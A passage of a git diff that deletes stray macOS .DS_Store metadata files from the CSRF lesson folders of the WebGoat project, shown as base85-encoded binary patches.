zgYN5~fK|}uyEQn;y&>_oq*TF{_VlcyTc$mtWo)uZsoW;UPNXf<Tl&$oWn^beJ1K?I
zijmG5ilcQIMnZo;v&S55-eIW;+sZgSykSz3vbJ`IM(y;R)=RDJF`c?&%_I!IxwC4|
z-n#t<4|N>5wCkF3DO4ef6U3b9==bPaW_XT)H?G)e%~W-BYBa~FGqfR7nbAUlnP8B6
zU0W@SlPdK+V5!VcmEINHn%ZhvKErByG8)CIAaI9$5m_9v*%TD7VSR%r4&6uSOSac(
z;{j0~Hk6cRNNUh^Yr094M{}+;(n+tdwM~@A($>rjP1+7&)GO{hEX#MXkxwbMb9z=Y
zX;z=p@JEl`x=XH>y9-~X_$vy+IP>aKRhn&Gd_P}t2-d}$-4yN5HPA%A1CGNafj<jp
z;YoN3o`x4;87{y(@F84;FW^h~3ciLF_z8Z7U*K2x9WEn*gCdq=2rIA>ufyxH4(qW2
zo3IVru>(7?3s2xlJcR=|f=Nta8daRZ2k{|%81wizK7%jdE4YNq_%>d^_wappPJzNr
z-0#iNGx!lDHU`prKN%R^2*_|>rP#kUK(6d`F|6EO<#E}yy0}Hlxt1#qlS>Pys6Yt^
z^$IjE5v(<PYQ^v{!KTd@FMk0GX}gOOYrQWL4od>3hh^&<C>tQe1>RTVfv_l*aFAIo
zF&dW2II=8Dbc#|bhni(O4^!<n&MwOyJw~<Q-bgGTYzT|=F#kK)Ex}vx0Y~l|_!fSE
zAK^E8>3kW>2()UfA<V+K7jM8uyb+^#kU;CioADMrf_>OexZO^`4H0f*IF1tpoQ6|4
zjXGw~!5q%vJU)VF@lia7j}d;);&b>szJxCqfp@$Jyz?7_SG12@>9l3J5_e>oo&Wnb
zfB(N_^YaJx74Q}K=M})x-b8OVjZ@f8i-%-q?Fe0W)5QX7mv=39p@<*H$@1ek+0{P`
kDIKAv%qQ;Iylbh1!oU6^fd4<~@Bf?p!u9w6t7QNG3-)ECH~;_u

diff --git a/webgoat-lessons/csrf/src/main/java/.DS_Store b/webgoat-lessons/csrf/src/main/java/.DS_Store
deleted file mode 100644
index aed36ee174e4cbeb73eb5a17d50e427a8c957a2b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK&2G~`5Z+Bf>$Ddms8or|UXgN01twP$!VxKwODjZCuxl$>$@NCI(+EY8eC9Fu
zY5N`s-hcxK-hvA^W_CAGs*qz5pc!lSo1NVm+uvHd9>y5&PT~W`T*jCKidbtx^Bci&
z)HSJD&lVuZ9K|?FRRq1C(Rgh(IsQflaP8_$v78N~>FWBWvMAf_Z@gA-+}hf9nmfCA
zxwm&-1tT>L%CMXi-7tTtdooTUYxl!)w6G7AN|$yR9m!-maPK}*SsBVK$yY*8j%60B
zX;)3MxHt(+zGE4eqk+5E&y#Zq?T1-%BnuhIRF-d?CSC(~e>U?vUQ2kMH*bkqr_*kU
zhYudj=k9mMxp&`t{OrYe{`TGb4<9csuReV?Yrx@i)pEz;0=|G@=}3nM!Kpf1{gCa*
znd<f8NqNfH*B}0K9l9KeH;jx&o3fn;d6ued2zeGywRjprVt^PR25yJ}yWKduH<X{!
z5(C7*zsmsb4+0d?w^$j}TL(0{1ORM+TMO7&OJIz!=v%A|!UzaAp@1fo+Y*DDaPSK|
z&$n0^G~tZf;)B~eb6cTseRs$&^mN93gVYiO#K3h1>Za@B`Tult{eL}(dc*)R@Lw^&
z8@-^{g;%m?>)OlVSt~$agQDQP%HT2t41E;CTs(^RLA8KipaJMxtPFw&gnk4x4b%_=
Hf0Th=uWWg`

diff --git a/webgoat-lessons/csrf/src/main/java/org/.DS_Store b/webgoat-lessons/csrf/src/main/java/org/.DS_Store
deleted file mode 100644
index 89210ac2d4eb476775a1de06ae5099b0b5af69c3..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK&1%~~5T13MR8B4`Z6VOhUJE`rw5qSF>mCaRm4wg~SBgZuAZvvsM-*ewxsTER
z_bBZf^w2}!qL<z}`{N+vHkUvtVMfe;quH5}^sU+T000}z;{yN}031|>tqu-<5H+uK
zLt56egUED^JgSO3N@cVWOOF4O0kwA9AfbW~3TUq1uP9GNQTBS@S!=7ky>r9q?Cz<{
zy}A1$n8+$9!*X5>!r60uC*mZs_9!eTEBl$0>4hCeha#!Q?(N4iD?^bbvqtL4k;r0M
z4dgtFi<7|AI}&j@8M}8zv*a98M`4y6ib6yp73C|Zqpq>LzgT#Eugg8pTXy-P-|uz#
zgZmGcOZSK4+`Z>LdU~8MU%z?#?)`_4pFV#vE5Yz5tL2u(6?{dbK}mXc5S+?szM5X2
zoyy@bo|mTp-+ubXI;N33mGLFB`Q)<7=fNyXWp;)&S8v*Q1u}^NVt^R93IldqarUlK
zgmQ@iV&Gabp!Nrjs?fJs8`N6|4!Q+EY@=HX+NzgOIozUeu{MY^D9ofHnp9?63}({N
z&uyG<u{LPZf!XGR*(WpGp)mb)tj~2gFyA1J!~ij{&cK$rb=CR*<nR6edJ^3c1H{0!
zVt}=W!Ek_|WY5-(k5gwYM}3K^M8(wxFH+FZM={2#qj(=x3;MY-5PgfaLG+-|9|27R
K4aC4dW#BjBZ+@5n

diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/.DS_Store b/webgoat-lessons/csrf/src/main/java/org/owasp/.DS_Store
deleted file mode 100644
index 301eb31339970de049125dd75b347dbe018e46a6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHK&2G~`5S~p#>$Ddms8p$!y&~n13QVphgd<WUSFI3*)UK^$CC6*Un_4J}<Z~Z`
zmY?@P^bLC8z*}(P#_Uh3v?*#&2*Hju`_0bI?AqT(yBPo=ok_d{-~xbyDzVnU<_3}D
zQkSG=JgbOA&A}lA5tT(ArAyJ)@i#Ic_ihbJNFag%EbJeTaO7u{r>qdI);CgHsoz^&
za~kU#@^SC4zX^uC3`8g<MJF7;Ry`Ick+FNB7|!io&eKafjP_Vk_T7iic_u=ZCF6zE
zgMF68yzKBv78eJBo^PMUV%T>#d*kF7Q+r{S?6HDHEM?-I(~wW!-I`9lw%4Sd=gpdQ
z+HSX+^vUC=vzhzdakd|M&tAUDXD9DZ&pv$o^!dwIy%z+3wn`otoWnU9*Jw!xJHZhj
z<@1o`h!O90<B2!|xcK3}RdLtm81eX)h<te4D#yV%OL;cH`R8xH@JiOS3|Iy%19xG-
z93RfcU4m_lWxz7<Uojxh2Z}1uH&|&@M+Y{l1VF5#TM62-mXJBrpl`6!h$AROry}Z9
zVoD66)6q{&oNutwsMCR%;)9r#iK$SCS{>)7DjbNf(YBTW%fM9zR&>{u_y3FE*Z)_O
zY|k=a8Th9dAoXt0?cgVwyLIW~<XuZq4^gGaxJu(?3L5Gv##nh3Z=otdKa~ceZ?Mvc
R9u)gWK+#|u%fKIH;1}<7gDU_4

diff --git a/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/.DS_Store b/webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/.DS_Store
deleted file mode 100644
index b55427e3bc0f6883666cd2d28334961ced1390ac..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKOHKnZ47H&`mDqI2GFRvgqG~unFM!mM3Q|jF!R)i(irj<)@Sbgu21aa<P(iko
zJSVpEd80{U5z)=quSHfOvP2;&l^J38tmz`07eKW!9^~<`UvGD(<1jPOId*aFS2D;!
zM%l~!`X~0|sq6ajX(#gXTAyu8pX~j&_Tm0d@pF#fEZ39_Bm>DnGVn77aA#AN*N#~y
z1Ia)#@WBAjhk`<^fz8p54pf!`0QrnIfzDilF(t4DHb+<>>Y+dn)krba!_i;DuLd?p
z4;PK(Lu2Om<V9_Ej9<)Mv^r*;3?u_n1}?q1;{AV%UuHJRpN3>B8At~H83VfLw%rDs
zio5m8_ITG8lsgm({TdYr^vNRt4W1)6W^{X@4!;`M961X6EgYB+0V5=<WZ)MVcmrnP
BDf|Ec

diff --git a/webgoat-lessons/csrf/src/main/resources/.DS_Store b/webgoat-lessons/csrf/src/main/resources/.DS_Store
deleted file mode 100644
index 4fb1e9b269cff0d83d78b2190de71546ac938ea2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKOOMkq5FU2}WZO%4Nh@*56{&}I7j`*@Za5-U3fdK7QAsw@#wd-WCfy2Em2&21
z@ctW!$3Nh}fq%h;3u64(lG1b~E(lc~%l^h=kH`Mp*fju<-Z<<6SO8#R=4dprs1e@I
z^O7`_<q9I<V<abC@0bm<rJmZL8PE*;j|}i{*MJxb7(!C>{m$El%yq+YaSZU~`~G{e
zluBE;vMr03&IAJ}bm0!9!6eUugatU-k048EUUWKNNn^vfaPgA4*=+G-U2Z=1Vm9##
zzZmB|fAmPyXcz@b@B2l3raxdTnd^RVK%>dPy0*{K!l!98s<<8<(llg~9vi1&e&osV
z4ry4#1M7N!6rG}L-%q0hn$v(Lw0LH2@-(ovrqkW+ownWWY|q;EbZ@WIwr}n1&Sus(
z)4Xx>_TBprv)S_(FJHZW^Y-0`Pjc4@9*{z=Dm;VFsLTne-2g?_!UlX4?sLB(t8Bm@
zZRc&ksW(a!mY(2fe0~jh3VF>Ognc3YPZ3|)E3qr~nz$`UAc7ndgB1E$^AYPJuIO2v
zgDV+b+4J|T&hJ?>PqDc5FVs)cY_0!N^$Ilunt{J$fS(UGW{!@+QldCIun<oGL<7x2
zQ0H$6?qe%-6qXXP1%*ggMCnS@6N5;1wA-qmqp*}H-GQjb2T_rUdZ7>z9mlstcOZ^L
zU1|n21B(o7$g0Kf|9h+7|BFt#rWw!-tQ7;qa6Pw&OHz01(&G4CYh!+bnG5e%N)#?w
ksOwlL{3_nUECkzZt{^%JONnSf(SHO44Z6?_{8I*g0T!>y-~a#s

diff --git a/webgoat-lessons/csrf/src/main/resources/lessonPlans/.DS_Store b/webgoat-lessons/csrf/src/main/resources/lessonPlans/.DS_Store
deleted file mode 100644
index 1151fe231819a1c35d96116fb7babc7806c1ec2d..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKJ5B>Z47HOKk!Vt;oGau8qi8rmE`XFpP!N)W^xJWqoQ9il0G>Y}!azz2c$Vz9
z<MEr_eZ_h$BDy{fE0KkW%;AReY@s*XH}7ncnHf;+jO~7R=&CL!j60EAd3?BAZNBh5
zzuUJq9G|u#FR$(7hh={FHh;M9&bj;q+@%6kfC^9nD)7G)K+iUtUj;H!0V+TRJ`}L;
zLxCIC#4*r69SA-G0PQ#44c9(P0E;DnHE|3?2Btv;232#!(4Zq<vaTkMfk79|;Y0Jz
zniGop-En^La?u*dNCl|CxdPKzF0B7w!+)6n&q-WS0V?pP6wq1Qv^8ESdu#V{)@uv=
s2L5iS^>PGn#XxVxSXe7weyS^Wjs2Q9209&irvv#TV7kz#z;7t<2Ki7SsQ>@~

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/.DS_Store
deleted file mode 100644
index 0d597e3dbf596974fdd877729e0dab83badc8e41..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLT}&KB9RL3hN_Y6M1BG%uY`qkbiidKAf@o6@xMCaH6g}X8qPTavz{X|wa=Uk+
zgos9?ZPcjI2VYFAAJx9-ix29HFE*{l_+U*+)ED1;GEpCV@WKD=EFb0Lt<fgk+06WB
z{vWfmzxicmX8-_u3tAi?3;+scA$bKATO?r@c~c7c8WD#S4^A#)+8Jv7lgVxJ4io_b
z0RjO60RjO60RlGz0<>p~q-?YAOKVUD2m}b+k_d?PAxc@ugfEw*^p*}Pydwa~Qc`<~
z>RePvMtzy^<&u<Sp@cG&qzpy>h=DSk^ikh0;mai{WjLUJ_(1>7=$}x~dpq?X_1pmy
zQU+y!K!Ctz1jOE70uJOMo0(gGem4!rZEIV`P)X^IvYiSmuMiKfE`KaFW6z~r)h#%^
zYW|GZGBiEo*9TR1W~Dx4+vaLr&5RiO+$68<vn^LOEIq$2bRun7nmyNR7c9-0NXh=v
zhUU&p^18viUZl`L)zU`{$H*9_;Xb7>@l5iDg@x95M`w2|8gIXUF&15jx3?dPMY|4n
zEH3h26s6(r!#$_Qa*OBAzxVzJA71$A(q#z(`U?r{-T=y#HAFNgYi8&hgsTtI6zMjo
z%;|V4YtOE~@$j8Zr#L8YL_&{bauU&NtBA6Sa8GS--z4V+M}Jf|Ro5u$N!8VzNxsV=
zkWXZ7%m4Ot);0^X7FnvZs+ld2v)*HxDdTC~8Flq}SJcKGJMZ>+j-v*}3f&~H5!jv1
zxrS{yBYNH;$=Jopy2$><gRO_Uj$Ey}Z5L-XtTtT~;F|jIoWOldb+Wpp8P@bT&4%R~
zQ-+>r)uHd$kfqM*GO9kjm+{Y(35|wx%GQLB=2^n^;eCp7M(F$UI+aq*qTvIKtICi=
zLz7)Jv1Y~{HuNMBK!&!kn8GzSY^oXEl&bq!T;T&OU6kXO$`014RAY>d68N(;LPx5*
z!w)L_vhuii_es@pPv>-NZB!2_%9yb9Xqv7mjfsPD_8Svzvckniv=?G<6#8KtvS7g+
zybQ0vtME3Qhl}tjd;wp>CAb3L!1r(smf<J(8GeI5;7|Aq0U4HKC01b#HsI~JAMe0B
zu@&#dHjHBzCa?$lFo`E|7)Njn$1#g0&Z3Pud<I{_vv>~Q#JBJrydcLDTA^uDwpU90
zm}+Y@^Do{)>8)rM>92Y?`M=O?xl)j;x@LE6ozJ$O)!FiBw4NazDdensY*?A?4KsN?
z+4c|xBMofdcH|u<TIus1Px#KO!kb0e0guNVymq81(yS1Pc}SXDA~8WxULvg?^)$wJ
zNGp*}(3O`;Yd0gZ4KQ9Nn@1xF!9A`>=cY)KDIB+;*|sEmmnilLd<kC>#lD3f;8*w^
z{w7+LA;&#fj}fBPKD-N?u?6oTVs#R!y72)#g2%8QkK+j(z#$@68b>{HX*h+`XkZ>4
zEMO7m@mYKhpT`&QMSKlk$2TP1HjwT33eBYS$mo-8)=nn1f|~{Sv1{gY&%SEWwz1@9
zwp$^Ksk~*{)-?4ah+YORsI(VNgAVTc)mM%qC~qhNC9=1$_y;(){r&$9eP_^FfIxu2
z&4mD#CR52?8q><Z#>U}^vv!p76O=^~eoIn%Ayiy<5kPJKIPUpI$yLN8e7Pj07fO0B
Ul;nSO5fJSE!Tv7@c#Efh0lIMvPyhe`

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/.DS_Store
deleted file mode 100644
index 0913be2c6a6da292e48938f7d77736dcbcacfda0..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLTWl0n82<llfgP@AxenBoiKPaxD5XG)0@-fMO(0aacaS=}Gqe+DXEr;tyJ%Cb
zF)A@?jF$&rOvDRHVtg<@853V5s6ijZ1RhL`iBX?SeDcAd|GDhC^b&khBXc%${&W7z
znSZ|X^_-pq0GKXWZ2&p|#OdLZEuw0c!tMN-QDRE7f+SKrWGg`->-t&h|31SzQbY(u
z2t)`(2t)`(2>cfipgo(H_#FGbv_^G=K!m_ei2z?840^asDLEyjSURW@M*xzIq!xwR
zj5kOcN~V;Yl9DV`P==C}p{R}+D8or_D8H1FQ&P%sKy~;)^=4Ej6clf#@eSb)n36K8
zBLpG@W+K4P?v0QK6CCjB&+plS>jdG}tyeMD&^T}Yg1EMD5&yBo!Ur<rekBu{VJS$P
z#p9yqSaw#md(CjX+V1mxx7IeZ1CCu8Wh=XVFEky`F4l#f7<4?#ucZBwX9XuRa=byu
z3dcv;s@|eqrqEu~vj?2O$vUnRJ{;HhZ<IAnOl)b}zH?Wr(bnEM*=kI*wYP6;H9B@|
zpPXdh#^X(!c61#bE=)di_Ki2+di&fv7cNQ|P%S0EF{m$}QKyE973AD3eFb-}DNm7h
zhSD8t%jEogp>C*JfE$#1<;_U!zACa;YRGDf^sYp@dz7(KVBc@MX6Tgd9y7FqQMN1~
zun*;YPhl{a^W9S3BTFJ@y15cL+g+}kaUQXQq0l}Z^43V;7sGDhIOI?)*Nw8}9K&OU
z(DA)sz%B+PHSPT3RqJkT-neC3$L`BZmM&w7<(f7^=zF1a%CU?66+Q*SW{|Tz%kjnr
z%N&2#?(@vNorqo1G!eCWjjo-rD3znW#p5jYVO(08*68|iZs{)CR9o@52v~3ET3<kE
zF;h8iXwkI3hlm6$P=jvTtm*x(nYCSJX)^52yEJ{UEOTdvm9l-irVkPFc}hA+V5?Gh
z?$Y&>{LM$qAUsyEJ<95$di@^CYM9%)EQ{w9Z%%EL^VXc&DjSS%No%1M_QHM`fgE^H
zfoI`4cphGbv+y2#03XAr@Ht$9FX1b=0zbfy@DuzDzrr>60|7N$iVPFD9GlR<+prlo
z;1+Dh9k>%aFog&4UObFPupdvNiCN5{ixW7BkK$u^24BRN@MU}jU&C`UpIDWyJ#_@5
zCcaBmJ<-$^Tx@VQq9yk)IgtKWh<0_cq}Pg-s}$e5YLh0|RL>GY4LSFM6V*ANHlNo~
z?lO^Z?Ybr{*-s?0PtV0%wm?#Zd#^V%je(>w?{8>HCRvQQ8yACZ+MLu_gJ3AP68VyB
zp5P+y674kBDA>xoox8|7Uyzb__w1#i;(~Czn{J_@kQS_&M4OXlufutGA3lOl-~xOB
zU&HtC3;YJxu#t$h8g-)8EttgHaU<S=twgPz*ok-JJ-8e9;Q>4(=+%b<IE2GELiDn6
z49C&IB8FJT3ZBNt@d<nqpTei{g}(?ljcy00(T&rwMz_4*(_@vw9Kbh0?3nPZvsrW6
z3gdIHmE}y)bA4}&Mw5$f2sQ)|Uccxn<*bXYvehNmG5(!Ou4bzxH^Vkda?7AZfBzwE
zk|DU1js*ss0-xFz^@_7(af67u+^WFcFrt?6-;9{$I|K;TszEk%e*WJ#_x*p>J(3Xu
z5d!~11hBCu)03tTtNw>E{TumN+o0z`dU)Y}Q&Nf$s;;{TpuRee3txj=c}z;lDJexL
a=|w2Xf9N70+W({dAHuv}+f8rI{r^umCXx04

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/.DS_Store
deleted file mode 100644
index 7ee598c2b590178fb052c7c2e0e89086ab62c78b..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 10244
zcmeHMU2GIp6h3F$!t4Mt+k#!F3u{Uv#TF?oP!w=mihw|9+|oa)>+H_hj?T_(c4l``
ztk#hD7o+hfF)`7^R>f%KNu%+>#211w{v~MagT9y;^~uC16B9l6-r2e?+XoY&nA|&=
zd+yIU_ul#LH*@x$1pw?X7+nBy08r>=Qd>z`jl}xdeMt%hEgDHAdq|hOT-tWiRR7}=
zZP_3ZkO)WwBmxoviNMu>0Qqc|lodkCTp}P5kO(Xwz`hT0x|vJ_az;r0>7a}s0Z7(U
zGfz}z#{p&&4`d>cGeS}iB^0J4g((I{3>4<n9uM>qft(Rim;(lf4-96;;DmyFb{ap<
z)d3Si%3LBK5x5iq_PW%=y`V!8^vd&lI%iv+zirz*hU)4YmMvGp>I!yg5%tdGlv_&r
zx?k}6_54X*vkWsGlm~Txs$3p&U3;Odr-v=Gl+xDhcO75195Y{GIx%87hFj`)3y$GU
zB*l0mmf=sOw6%kIvq+|cx?>Joo|U$2%fDX<vn!>woIc&z)zh=PBi_~3JKYgK-PPT_
zy(7MBN6+-M_MM`%wD0IUHkO-ya(3>u*WWn%=J^W(1`IwW&{PG>CzY7klU>P-o6S||
zEZ}8(#X%A82)SjvzOBG3IuKEBOKFX4?Z<Pz<vQN5nfFMhwACJgcsS!a!LyBIT)U8U
zyp$Hn=ys-H>%Q4%+ezyI(;M~8Q$8z=dv4y}&lOXeR`AR_OwzN8<^XAXqZSRv)HDpg
zwQ}wH4Xv9yx9{3>an&`ewMe6?juWVkZ{1^=`4c6E?3nIlOvkXC$&n(1)i#G5J!?in
zpM}HR>e}Y0I$_Y*$6SNi8QOb_=xJ$=Mo+Sy{dtpeLs7WF#&}d6^4JpeKyg!>st(;p
zd#icDpzT}K=m}d-o3>_zh1u4d)aXc2K%*TA8oPVc=qN#-rA2!Y><F5BcSoalv6+wR
zo_{=NI<%?_H2vOvx2}pdNBhf<QvHaEGRCa>41-qNn%FEhG~All7Hq8o>tHK6x<fDl
zCgk7@JOxj~Gw>43!8v#rK7#Y`DSQrJz?U!&Kf+J&GyDR-!Ji0-sN!mjU?Vo+b$C6t
z;wEgvt=NM*aToStA0EadcodJ}Fs3k#88k4958^}kFwWo;_$<DNui`Au;X8N^-^UNc
znnGoY9;~1r74c)rDrp#m-9jU^Xc#-tq#j%v8qTj2<ZD{9Heh4l!j@KTVkMh6g#<@9
zcgo!0^!x`QFA_!9t#46dCx~L^sp?HHlR;Z92*k8E#$z!};hbUBO>I;S5wR6MR{NHi
zs?~A&vR-0lOl#moWmV#&s?~EUvuf{d>RrYe%c^_#Q7?$sht<PvF_pei|AuU{@HTwN
ziS`wI1K-0B@GJaI6l)-QHRC!WR}44c4cLx1Vh45-y?XIxyao5*0X#?~yPaq@L?j!<
zF&rnFnK+44Xki|GEMf^y;UjnkAH~P;aU$Jw_&mOVFXJm!bURc<x3iUW%en&tM#0Yj
zeC;)epIZx5%(}*+eYvT{zof-v-mzV0lICHQ4?~__K@VIgP$|R8|7YK{lli9Z|I9bl
zK&OV6s--3UmGoCj=C5iKQhF}wxh}KkszJO;9~K(o-ma$B-`;F-tr~u<##mJzj!!8w
ziNF#fP$%Y&v-tmk#sB|b!WGJ?B?1zG%Z&im4<rZrX_j)dp?X3VYmd`?H{C2Ty%{07
y31vJSPm+h@slvkXJj6n6<p2w_OHezLGeS~{(iQ(RK%W2Q`M-4KV$)aS`TsAcj4X8k

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/.DS_Store
deleted file mode 100644
index da3ec95ed2fb32595ebe59649631acf665cd4ed2..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0UrZcD9LImZ1KPc9D|=96DPDU9h@}ETO9iy82OQGck`j;qMbEw46*lheUT*ge
z6j4kQ|HWwhlbD!jBB(VQ`=rtMVB$+tWBiv?BM<swV$>%SpG-{jH#<Y2P#%1!HR;Y}
z=Qsa;Gjreh+|11a0QMC0HUJd>Bzl-two!DM!0OqvA%sK;t3>h#H<z}YH0AzE=Qgws
z3IYWJ1p);E1p);E1^y2T(3#DGw8^>8YlApYAW-0%RDkUdF?yJd3%kIrzjaXLUjfLL
zQn4Q>t*`{yn6PnS7r3Pw3dmi_a#s{r4CL-q9uw{2!Y**j-2uhr1I5TFZYb!FPW{LH
z=74c-gE&wiP++41>}OK~4&-4fJ+t=yZkevv+PaLPlG3s*TcxnPjeV4ed{1)PnMrz@
zS8#i@{3$<Y>PA|m2Q_bcB|YRg*2T1z9x;uXl(Mteu|3VSjr<zd$x+kRotYk|VC(K=
zlJ_@i>fUrpsT#~1MRFa~Y-7Z9&9rHm-h)z@eNsy8++1^8dwW+?tgWqcz9}}>cHqGN
zrdY?p_W60`2T7`JJlH)jo|}Jqap{dW-#YX5x$|5E6dMUtt`p_6RYk0+wq(Z1u6>sw
zw6fgdAb-~pa?&}j)%R<(QWFvR&XiKY=6y2fnU3v_7<rd$N-1|qz+)N57T;?$<5-2P
z?WUASMzb;nOY@9w%SxIL8Sa>8%z7*};W~M**Ke3ol!9yAZBRS2Xe6k$J7!XMteJx0
zceYpU+FiG|d4I>D3p=hWS0WX%JVAomo_W7%<cDXNs^glQF>Kwmr$&oRQp*^!wX6{d
zeGv}(Ue{Nv@}y3E4>&sW)0Gb-UQ=7Gs;5{@Z{DC-mn7d|PfV4ETs8$wG^}rs<)H^?
zT@_b!+PF_vhb=8_Sc)FzZY{US>S&QmqZ}872ij$IjD*k9q}>QMiQ>*KRlS#ud_r@*
zlR3ktS)Hfh4<ET>hgz-ntbCRAUs00AnOC>2(`@VFd-;Ng>*B3q=_ROv7CPdN!Xy}w
zgVXQ~JPXgkE3gD-;eGf7&cWyKC42>6!!rB~zre5X8~g!(BOs!T<ru*Vti&7eMy$hn
zY`_+5$6K)jJFy#&;c+~H12}>yOk)Oh%;LlN2tJAn_!K^mFXQXDh)eh$p2ZLGBR;3l
z3ZDI9j>6!llvssOyl@MRUJk-&U!~lCbs${c&e5yfStVHPzPO<4mT)agK0urhpPUsk
zd^j(`@d5!_v#VB)4ijL;?D{2NK|$Hd@nNm^#G+9}@`+*D`Uc8|2y4mjt8rgcR!V$$
zSuJrHRmyx!S(b>Dl~NyMmhJ4K+ATh>EPMC})dK(Vuza{7D%0-tZ%|u=cj03nvv1%#
z_z`}B-{DUJtc>8Q#u`E^io5Y9Y{Z+f37ZM7PP`3o$3xhM{e;+E1lbTFHiqLkL68|Z
zh0|za9z87L49?<Xcp4waC-6x^?ge}iU&2@MwRNx^T?gBlRoJplBB2+&48XT;8Q(Jn
zhFM47q$W4L+5TBf=55Qdr>OrG&@UZ2$X$5_O85{eyZ`rX{{H{UPb3&2P#{p?swse_
ziDaUOhTm)}W_RrvJ@?VW0&BOxt?xpSe;p_5U&qO^dxak;9b*ZyabXv@r4kDN`HKMd
SkC7eH!TBGY|2~1&X7mqKp#rV|

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/.DS_Store
deleted file mode 100644
index 8339472c99d019461c40bd63bbc20760ebcabff9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0U1%It6vxlmB<<|9HM2=$CXL&!B*CU8G25ml(Y9{BOlun&+<Z5>&hCuK;Oxw@
zGrJp&(MZ8BMDYUzLBT|=DE3KFd=Pvo74ZwIm<N3kM12x`5(GW>&TQFint~Lx(7DUp
zb3e|xbN7FLduQ(e0QTq9D1ZzA0$t2X+bFw4V*TvekOE!{>qLqN$RrDPCTUp74ZePZ
zuYj+BuYj+BuYj+>)u8}Avsn^0dG5Qte(o#aD{xIJ!1jj-UChQjyX;!Nbx_8S0Awqv
znI|gKIe^DRJR9@uvTJ!Ljp?2q&<jQHh=Fc6^+%XH*_daSUF(Jey5WG{ozXj?Aiq1s
zMYua)%(Z^*E8r`zQ33X|sR9cMpn$#Z{Qg%mW9YWi*|~;+ipr`jTZN#wjeVq$cu#!Z
zD#RVd$=Ur%_7tz_s+RQ1qlz<MERR{1aj~o<Cv>flkaiAOrlaVlmMsaLozzX$D)d`9
zQ?+N~?s${B>dYsky3wqbr_fQw)FyOWPwIy5JSYU&Cm}U1F1AOzx_a9p(P+<7TVyeM
z;K2U2NcX|6r6uVHL1=6}*f%nrS$cY9^^G^*I`j6q^R5u+Z6;7#Cd_B+RWatG@syR$
zlz5eBX4v^r_nk+;Dr)w9iDvR(NW3#4)v)=W%s9Gb+7nvVCYz9|Z4&ZW$}+w0H<_}G
zT-vk~QYfVushpuWTAyLW^@lWj%Fz}aR+_P`tTVtJ6Oxp(wYxR))AQOOdD~Mu4aeLh
z48F6yZrARnz3uzE4_(-CU9}Xd5ycr2)^zmybuBwyVCqgQc1kl<-JF}uGieQN%v91^
zDDXuv$fK^Wm&I9?#vZX$7N<%d2yRbfy)2(%Jp);da#av`z@CUKj@fJqis#teB8p=V
z(E3WYH)!iVQ64vxq-IEJ&<*RjMU*G=t~Andukk>aC{L02X_~Yh!ZxqDr&pHmWp_TI
z*v`p}X40(A)9nu*xnqZ1FZUO}O8Hk5glQJlr>ZpDrr2J0NrO$XPH%AqXn+oS=p2Pv
z&>#b+;Td=qo`Y9l70$x@@ClrQ&*4k>3ciLl_!)kIU*R|S1O7%pL=meogf&=;H{gxf
zgw5E39oU7pVmJ0+A0ETwcmhXo0uz|T6snlUhw%}76qoTSd>&uM*Kq|`@jX0?AL2*u
zoB~Bmhf4sYB7REQdJw&rZ-L26ffydD6^H*H5ZAW5_|@*L^LXsLxTs~zSjrQJ$fbnS
zQ>23fx(>+;1Zl&rMln22kZB9$%U;Am+Ug?2y!S-HVM*ZBuxfJ)RRe^!z{hIc7Z#-o
z4lwH_Hp5aCN0n8HN>QrhFtch;FZFKW%(Cj?Bh(A-4~W%+En$&%s(*vq3cL#+bJV_p
z@8C!H34Vt^39>2ztR5Q(uQ2Y$o3Isc#x`sxz<TgDyd4kW5DpV&cM)h~gxM5M;|zhO
z;T+DRj#+dtj|E)7$M7^hj!)o|gxw4HBEE#L;%jBV9W4Xy%zEI`*5II;b5a1`+EsPj
zw*<$urCz2tGk>`~H6PEKhGovtm__*4PsOiYxdIjL5HdUe4{iSb|H^OVkKildD{$2+
zfR%&s!G4<FW?L;gYe(q1k1m#&-?D3Y2xa^@PL?0X$+B|=PgIVu0@;{nmt9LOl>YM<
V0sJo{dn)_SfB*T<5xgd|e*j!~4)Op1

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store
deleted file mode 100644
index 2609cccd36d669cdf7efd8f2caf906bc80c36410..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0TTC2P7{|YFfigR7WfqDI#ckIBu~a~A6{>ArZqnM45*JvY=sLSI!o=B`&CcvD
ziYTUuw-}9=#Kc4sL9Nl)CymAj6JMGd<1ML19`wb;s81$7nV9Hz&dfHjln`IMq;ocN
zzH|A$GiUziH#2(%0B|6ub^^!%Ake|Aw3D(cB-YQ4O)22Duui0S01Fgwk_9`HG&Xtr
